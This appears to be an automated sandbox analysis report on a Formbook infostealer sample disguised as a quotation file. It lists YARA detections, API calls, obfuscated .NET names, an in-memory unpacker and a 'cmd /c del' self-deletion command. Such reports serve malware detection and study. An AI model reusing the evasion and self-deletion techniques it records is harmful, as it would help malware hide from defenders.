Source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.297677672.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.542742634.0000000000BE0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000000.298278607.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.379109790.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.380945973.0000000001820000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.353744054.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.335216417.000000000FD3E000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.544623033.0000000003170000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 1_2_0193CF74	1_2_0193CF74
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 1_2_0193F3D0	1_2_0193F3D0
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 1_2_0193F3C0	1_2_0193F3C0
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 1_2_063246C8	1_2_063246C8
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 1_2_06321E88	1_2_06321E88
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_00401030	12_2_00401030
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041C0A4	12_2_0041C0A4
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041B8B3	12_2_0041B8B3
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041D2BD	12_2_0041D2BD
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041CB68	12_2_0041CB68
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041C3D5	12_2_0041C3D5
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_00408C6B	12_2_00408C6B
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_00408C70	12_2_00408C70
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_00402D87	12_2_00402D87
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_00402D90	12_2_00402D90
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041BF75	12_2_0041BF75
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041BFD6	12_2_0041BFD6
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_00402FB0	12_2_00402FB0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D89CF0	17_2_00D89CF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00DA5CEA	17_2_00DA5CEA
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D848E6	17_2_00D848E6
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D8E040	17_2_00D8E040
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D8D803	17_2_00D8D803
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00DA31DC	17_2_00DA31DC
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D87190	17_2_00D87190
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D96550	17_2_00D96550
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D91969	17_2_00D91969
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00DA3506	17_2_00DA3506
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D88AD7	17_2_00D88AD7
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D85E70	17_2_00D85E70
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D8FA30	17_2_00D8FA30
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D85226	17_2_00D85226
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D95FC8	17_2_00D95FC8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00DA6FF0	17_2_00DA6FF0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D8CB48	17_2_00D8CB48

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 17_2_00D9374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,

17_2_00D9374E

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_004185D0 NtCreateFile,	12_2_004185D0
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_00418680 NtReadFile,	12_2_00418680
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_00418700 NtClose,	12_2_00418700
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_004187B0 NtAllocateVirtualMemory,	12_2_004187B0
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_004185CA NtCreateFile,	12_2_004185CA
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041867A NtReadFile,	12_2_0041867A
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_004186FA NtClose,	12_2_004186FA
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041872A NtClose,	12_2_0041872A
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D8B4C0 NtQueryInformationToken,	17_2_00D8B4C0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D8B4F8 NtQueryInformationToken,NtQueryInformationToken,	17_2_00D8B4F8
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D884BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,	17_2_00D884BE
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D858A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,	17_2_00D858A4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D8B42E NtOpenThreadToken,NtOpenProcessToken,NtClose,	17_2_00D8B42E
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00DAB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,	17_2_00DAB5E0
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00DA6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,	17_2_00DA6D90
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00DA9AB4 NtSetInformationFile,	17_2_00DA9AB4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D883F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,	17_2_00D883F2

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 17_2_00D96550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,

17_2_00D96550

Source: quotation New Order I5117.exe, 00000001.00000002.300985845.0000000003301000.00000004.00000001.sdmp	Binary or memory string: OriginalFilename vs quotation New Order I5117.exe
Source: quotation New Order I5117.exe, 00000001.00000002.299926250.0000000000F86000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameArr.exeF vs quotation New Order I5117.exe
Source: quotation New Order I5117.exe, 00000001.00000002.306071538.0000000009880000.00000004.00020000.sdmp	Binary or memory string: OriginalFilenameUI.dllF vs quotation New Order I5117.exe
Source: quotation New Order I5117.exe, 00000001.00000002.301720083.0000000004301000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUI.dllF vs quotation New Order I5117.exe
Source: quotation New Order I5117.exe, 0000000C.00000002.383316492.00000000036AD000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenameCmd.Exej% vs quotation New Order I5117.exe
Source: quotation New Order I5117.exe, 0000000C.00000000.295796253.0000000000B36000.00000002.00020000.sdmp	Binary or memory string: OriginalFilenameArr.exeF vs quotation New Order I5117.exe
Source: quotation New Order I5117.exe, 0000000C.00000002.380477581.000000000160F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs quotation New Order I5117.exe
Source: quotation New Order I5117.exe, 0000000C.00000002.380859029.000000000179F000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs quotation New Order I5117.exe
Source: quotation New Order I5117.exe	Binary or memory string: OriginalFilenameArr.exeF vs quotation New Order I5117.exe

Source: quotation New Order I5117.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: quotation New Order I5117.exe

Virustotal: Detection: 22%

Source: quotation New Order I5117.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\quotation New Order I5117.exe "C:\Users\user\Desktop\quotation New Order I5117.exe"
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process created: C:\Users\user\Desktop\quotation New Order I5117.exe C:\Users\user\Desktop\quotation New Order I5117.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\quotation New Order I5117.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Process created: C:\Users\user\Desktop\quotation New Order I5117.exe C:\Users\user\Desktop\quotation New Order I5117.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\quotation New Order I5117.exe"	Jump to behavior

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\quotation New Order I5117.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@10/8

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 17_2_00DAA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,

17_2_00DAA0D2

Source: C:\Windows\SysWOW64\cmd.exe

Code function: 17_2_00D8C5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,

17_2_00D8C5CA

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Mutant created: \Sessions\1\BaseNamedObjects\hTlvmpg
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\quotation New Order I5117.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: quotation New Order I5117.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: quotation New Order I5117.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source: quotation New Order I5117.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: cmd.pdbUGP source: quotation New Order I5117.exe, 0000000C.00000002.383073394.0000000003660000.00000040.00020000.sdmp, cmd.exe, 00000011.00000000.378473490.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: quotation New Order I5117.exe, 0000000C.00000002.380477581.000000000160F000.00000040.00000001.sdmp, quotation New Order I5117.exe, 0000000C.00000002.380047974.00000000014F0000.00000040.00000001.sdmp, cmd.exe, 00000011.00000002.547350905.00000000038AF000.00000040.00000001.sdmp, cmd.exe, 00000011.00000002.546370328.0000000003790000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: quotation New Order I5117.exe, 0000000C.00000002.380477581.000000000160F000.00000040.00000001.sdmp, quotation New Order I5117.exe, 0000000C.00000002.380047974.00000000014F0000.00000040.00000001.sdmp, cmd.exe, 00000011.00000002.547350905.00000000038AF000.00000040.00000001.sdmp, cmd.exe, 00000011.00000002.546370328.0000000003790000.00000040.00000001.sdmp
Source:	Binary string: cmd.pdb source: quotation New Order I5117.exe, 0000000C.00000002.383073394.0000000003660000.00000040.00020000.sdmp, cmd.exe, cmd.exe, 00000011.00000000.378473490.0000000000D80000.00000040.00020000.sdmp, cmd.exe, 00000011.00000002.542989740.0000000000D80000.00000040.00020000.sdmp
Source:	Binary string: Arr.pdb source: quotation New Order I5117.exe

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: quotation New Order I5117.exe, pjurf3iJjattJ2fJLnK/GWCktBicAYvuaolwd4h.cs	.Net Code: dsUrGyXhsIspG3yEj8t System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.0.quotation New Order I5117.exe.a80000.1.unpack, pjurf3iJjattJ2fJLnK/GWCktBicAYvuaolwd4h.cs	.Net Code: dsUrGyXhsIspG3yEj8t System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 12.0.quotation New Order I5117.exe.a80000.7.unpack, pjurf3iJjattJ2fJLnK/GWCktBicAYvuaolwd4h.cs	.Net Code: dsUrGyXhsIspG3yEj8t System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 1_2_019374B8 push ecx; retf	1_2_019374DC
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 1_2_01931C6D push ebx; iretd	1_2_01931C7A
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041B87C push eax; ret	12_2_0041B882
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041B812 push eax; ret	12_2_0041B818
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041B81B push eax; ret	12_2_0041B882
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041615C push cs; retf	12_2_0041616D
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0040C2A0 push edx; ret	12_2_0040C2C5
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_00414E5C push cs; ret	12_2_00414E71
Source: C:\Users\user\Desktop\quotation New Order I5117.exe	Code function: 12_2_0041B7C5 push eax; ret	12_2_0041B818
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D976D1 push ecx; ret	17_2_00D976E4
Source: C:\Windows\SysWOW64\cmd.exe	Code function: 17_2_00D976BD push ecx; ret	17_2_00D976D0

Source: initial sample

Static PE information: section name: .text entropy: 7.38331082072

Source: quotation New Order I5117.exe, lvwCCairfphQUdrpdjp/Gk3IPciZWHTZFgD7L7u.cs	High entropy of concatenated method names: 'q2bAax5c58', 'OPqAwlsp9q', 'plYAs2rqZt', 'CLwAQN1DIr', 'MocAeVGrcd', 'CnWAmoYtO0', 'prpAjeQE7w', 'rgGAzJFAsu', '.ctor', 'dbHVdAWnC5'
Source: quotation New Order I5117.exe, rSYmiMiidWAWJyka4fd/UQARkIidLfqtEwaya3X.cs	High entropy of concatenated method names: 'QG2uFEReW9', 'Dispose', 'YhxutIaTAv', 'ICSuTNPr6c', 'eQiuYav3F2', 'rYguLAIydT', 'kxEuR7ggVI', 'kn3uhPIWik', 'Ow4u2VkkMy', 'bW5uxHm9H2'
Source: quotation New Order I5117.exe, LPIWikiyTw4VkkMyiW5/OgAIydikT0xE7ggVI0n.cs	High entropy of concatenated method names: '.ctor', 'YUGADoV4fD', 'dfcA4euF2R', 'IW3NFuxyNA', 'wU3AquopJ1', '.cctor', 'Ld35n7uo1HX7d12E41k', 'GS4edausGDY01hnHppe', 'BJfNj9uidT1Ymw4woT2', 'hUnC4puM5em6F9WL7Ao'
Source: quotation New Order I5117.exe, wwmoLdBfx3Ek6f9Wfm/IlRVH4KMNreX8k8Ct2.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', '.ctor', 'CeKiQ3h5iP', 'JkUieC3kub', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'UPJNucBwq2', 'mZBNZ8gN2H'
Source: quotation New Order I5117.exe, N7JlU6TvyD8UQi1vEh/BLcWdxtLUu4DgHUyIK.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', '.ctor', 'qYtuAbaWLg', 'N9BuVVQwQA', 'UPJNucBwq2', 'mZBNZ8gN2H', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'ty2Nbj2kfe'
Source: quotation New Order I5117.exe, FjKqRrigXIwRpcqUndn/pnE3D7i5O7fIJ6vLlnA.cs	High entropy of concatenated method names: 'qGiAUUAZJ9', 'eTNAMOZwC3', 'C2LAHdiA7m', 'aF5AgiS6HE', 'eRJA8q7Rqg', '.ctor', 'vg0ACFG7SP', 'qtnAoo7NDm', 'ognA135j2H', 'op_Implicit'
Source: quotation New Order I5117.exe, pjurf3iJjattJ2fJLnK/GWCktBicAYvuaolwd4h.cs	High entropy of concatenated method names: '.ctor', 'KnPVXWKCV6', 'lwFVckh7ea', 'PbjVJY5WGA', 'UyvVG21LJ8', 'KAnVpfokZv', 'FlsV6QnAVf', 'G0RVfqOoIp', 'V2SVlPr6XL', 'g8MVN1H7rn'
Source: quotation New Order I5117.exe, gd6Sysy2NZCVAkYGp9/psT1G2kiU0a93ePZdD.cs	High entropy of concatenated method names: '.ctor', '.ctor', 'oYYio1gBjp', 'eTCzi7nKI', 'INRidZnSem', 'slmiiNVVaP', 'uFJiuXZ4q1', 'uhiiWIYURP', 'xcGivSHWaZ', 'TdQiAvkSIf'
Source: quotation New Order I5117.exe, vM07F6if7gBGiEwjLMW/lJ1BSsi69nnVMkIAZhw.cs	High entropy of concatenated method names: 'TWCbl45R0V', 'OdRbNWBHa3', '.ctor', 'WaXl7S8uuHAdhCkgHdC', 'pdQvW78JjADP0kE5jX0', 'L84AwR8XUFQgs9CyJP0', 'AZtiRm880sm4X5y3MDN', 'gohaCa86T1MKAeCql4e', 'nTuHGj8BePNbgJZ82ws', 'oRWjhk80TUhFpCsAhLk'
Source: quotation New Order I5117.exe, VRquA0FpPRMjbhk0EU/TodAAH3aTysHIHBQ3Q.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', '.ctor', 'jIbNyXZjDn', 'xrLuddkRCy', 'h2WuiyOuye', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'ty2Nbj2kfe', 'UPJNucBwq2'
Source: quotation New Order I5117.exe, JkUC3kQubvZFLPyr15/fErpUQs4lpfeK3h5iP.cs	High entropy of concatenated method names: 'CSCuMmkV4t', 'on0uIyVflI', 'x4ru5e0lwZ', 'jTMuHtCHjF', 'e2Qun9RNWu', 'Feyu8qSdPo', 'd3aukOlSuj', 'WoMuyn8BXU', 'WV2uO892LT', 'ucGuE0T49g'
Source: quotation New Order I5117.exe, GhtsKDgR4u7VCnjUfd/pGku3j5yAM4yj2iYBf.cs	High entropy of concatenated method names: 'uJ4Nsjx6yK', 'CsENJn0kHX', '.ctor', 'AyiN626JOr', 'EsKY8qlfw', 'xSqNegyKs4', 'kunNHu6Fca', 'alINfGrFvZ', 'o79NNTQMWX', 'Remove'
Source: quotation New Order I5117.exe, ICSNPri86cAQiav3F2y/whG2ERineW9jhxIaTAv.cs	High entropy of concatenated method names: 'uiaAG8lGuj', 'TOqAp1pD7x', 'TTxAfQRYlj', 'f1fAlauYPU', 'eYqAEwYHV7', 'STJAZkYHq8', 'RDPAr16M5d', 'xGJAPjm6dv', 'Hp5AXseFaA', 'SjNAcKwNMV'
Source: quotation New Order I5117.exe, QtZOfEiHrLCy64GIZD3/VISHyniI6sS9Yfs5W8c.cs	High entropy of concatenated method names: '.ctor', '.ctor', '.ctor', 'CaIAACaUFa', 'U0tAVUq2de', 'f7vvePpbfj', 'Add', 'AddRange', 'Clear', 'KFevmS2uNo'
Source: quotation New Order I5117.exe, uEEjh99p8x4j0QicOQ/UwOtBTSrAxxq9J9hCM.cs	High entropy of concatenated method names: 'tQCNdIuQQF', '.ctor', 'UPJNucBwq2', 'jIbNyXZjDn', 'mZBNZ8gN2H', 'wanNWOr7Td', 'O6eihFcYWK', 'SFZi2HZYos', 'MYvix5d3v7', 'zBEiaXiJai'
Source: quotation New Order I5117.exe, oKxwfPfYvCsB6aRvag/uadQvk6SIf9vSVl9oc.cs	High entropy of concatenated method names: '.ctor', '.ctor', 'P0Xi0CIwmQ', 'HfYi8wKkoZ', 'gRviMPnBxA', 'bwliInFwVK', 'vmOiH4IFVx', 'EXpi5g69YG', 'BOmigwJCEW', 'vQginwivH3'
Source: quotation New Order I5117.exe, uhl2ldMSAIiohorlM9/Srfdpx0vD6TmtfV06A.cs	High entropy of concatenated method names: 'UF18Fhu8r', 'I12kitC4O', '.ctor', 'XHFymls7i', 'gXHEXjlee', 'SvDr6Tmtf', 'Equals', 'Equals', 'GetHashCode', 'ToString'
Source: quotation New Order I5117.exe, iDZ8xOiXgBHHPXagsT8/nroFEYiPFSTHcd2Ft6k.cs	High entropy of concatenated method names: '.ctor', 'HOEVWcBaeU', 'MSWVAtZTiV', 'eukVV1oC6X', 'kceVbFItkr', 'yGFVCm9vDI', 'GAyV1u1MvZ', 'aIdVUvD1Of', 'zOdVMF27aO', 'WCFVHZZ8Ln'
Source: quotation New Order I5117.exe, mFVx7XDpg69YG6OmwJ/wnBxAi7wlnFwVKrmO4.cs	High entropy of concatenated method names: '.ctor', '.ctor', 'nP8NMEjYtj', 'd8QNReeeWe', 'e1rNGrYZYC', 'BnRNglR4KB', 'WfDNAslrmT', 'rteNr6xdvQ', 'Remove', 'Sq9iEJ9hCM'
Source: quotation New Order I5117.exe, zjycuKiUmbQKjGCKIZF/XVQG8bi1WiwqJJKxPDO.cs	High entropy of concatenated method names: 'o4OWNmwJsk', 'ybjW7QyxHt', 'WehWqoDM79', 'e6HW4rSerc', 'XidW9I6EhJ', 'pfbWBLv6xB', 'xS9WFVtmyF', 'PscWTeKF7g', 'ab4WYSp4r6', 'T0dWRGqG8H'
